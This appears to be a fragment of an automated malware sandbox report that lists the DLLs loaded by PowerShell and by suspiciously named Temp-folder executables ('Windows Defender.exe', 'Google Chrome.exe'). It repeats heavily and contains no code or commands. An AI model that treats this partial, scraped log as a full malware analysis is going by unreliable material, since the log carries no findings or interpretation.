                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptsp.dll
